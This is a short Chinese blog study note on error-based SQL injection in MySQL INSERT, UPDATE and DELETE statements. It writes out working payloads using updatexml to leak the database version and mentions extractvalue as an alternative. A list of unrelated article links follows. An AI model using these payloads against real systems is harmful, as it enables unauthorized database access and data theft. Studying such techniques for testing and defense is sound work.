insert,update和delete下的注入
2024-09-26 14:26:31
PS:刚开始看到这个注入方式的时候,问米哥:“为啥updatexml就足以报错了,为啥还要使用insert?”知道答案的我觉得问了一个傻蛋的问题。不过没关系。慢慢积累。答案很简单,并不是所有的注入点程序里面执行的都是select语句,也可以是别的。比如insert、update、以及delete。
注入语法
insert into users (id, username, password) values (1,''inject here'','DEF');insert into users (id, username, password) values (1,""inject here"",'DEF');
注意有个是单引号,有个是双引号。可根据实际场景灵活运用!
updatexml of payload:and updatexml(1,concat(0x7e,(select @@version),0x7e),1)
insert:
insert into users(id,username,password) values(1,updatexml(null,concat(0x7e,(select @@version),0x7e),null),'DEF');
update:
update users set password='DEF' or updatexml(1,concat(0x7e,(select @@version),0x7e),2);
delect:
DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0);
当然了除了updatexml这个函数还有extractvalue函数。以及我还没有学到的“name_const()”
THE END
最新文章
- hbase1.2.4 伪分布式安装
- jquery ui 中的插件开发
- LaTeX常用数学符号
- OpenJudge解题经验交流
- 直面Javascript面试题算法思路
- 【风马一族_Java】 Java的文件类 java.io
- ts 使用Visual Studio2012和TFS网站管理源代码
- mysql优化概析
- 调查问卷Html5发展综述
- xgboost使用调参
- learn
- 乘法原理,加法原理,多重集的排列数(多个系列操作穿插的排列数) 进阶指南 洛谷p4778
- 分布式作业 Elastic-Job 快速上手指南,从理论到实战一文搞定!
- 理解C语言递归up_and_down
- 神州数码RIP协议认证
- hive sql 效率提升
- wordpress获取文章所属分类
- Git 修复 bug 切换分支时,如何保存修改过的代码(即如何保存现场)?
- Git 使用篇二:搭建远程服务器
- windows:nginx配置http、https反向代理